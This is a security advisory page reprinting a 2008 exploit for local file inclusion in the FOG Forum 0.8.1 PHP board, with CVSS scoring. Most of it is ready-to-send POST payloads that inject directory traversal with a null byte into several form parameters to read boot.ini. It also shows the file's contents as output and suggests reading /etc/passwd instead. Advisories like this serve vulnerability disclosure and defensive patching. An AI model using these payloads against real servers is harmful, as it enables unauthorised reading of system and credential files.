FOG Forum 0.8.1 Local File Inclusion Vulnerabilities

2008-07-06 / 2008-07-07
Credit: CWH
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

AUTHOR : CWH Underground DATE : 10 June 2008 SITE : www.citec.us ##################################################### APPLICATION : FOG Forum - PHP Board Engine VERSION : 0.8.1 VENDOR : http://fog.daviveno.org DOWNLOAD : http://fog.daviveno.org/streamearth/go_dl.php?download=1 ##################################################### ---Local File Inclusion Exploit (POST Method)--- ---Description--- [+]Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept POST Method and edit in request data. [+]All LFI Exploits were Vulnerablilities with POST Method ############################################## Vulnerable File/Path: [+]http://[Target]/[Path]/index.php ############################################## ---LFI Exploits (Use WebScarab to Edit request data)--- Send Request Data: fog_skin=default&fog_lang=../../../../../../../../boot.ini%00 fog_skin=../../../../../../../../boot.ini%00&fog_lang=francais fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0&fog_action=0&fog_userid=cwhmail@cwh.com&fog_path=http://localhost/forum/index.php fog_posted=../../../../../../../../boot.ini%00&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=0 fog_posted=1&fog_pseudo=../../../../../../../../boot.ini%00&fog_password=cwhmail@cwh.com&fog_cook=0 fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=../../../../../../../../boot.ini%00&fog_cook=0 fog_posted=1&fog_pseudo=cwhmail@cwh.com&fog_password=cwhmail@cwh.com&fog_cook=../../../../../../../../boot.ini%00 Note: This exploit will open boot.ini in system file: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) \WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) \WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect You can change boot.ini to /etc/passwd%00 in linux OS. ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top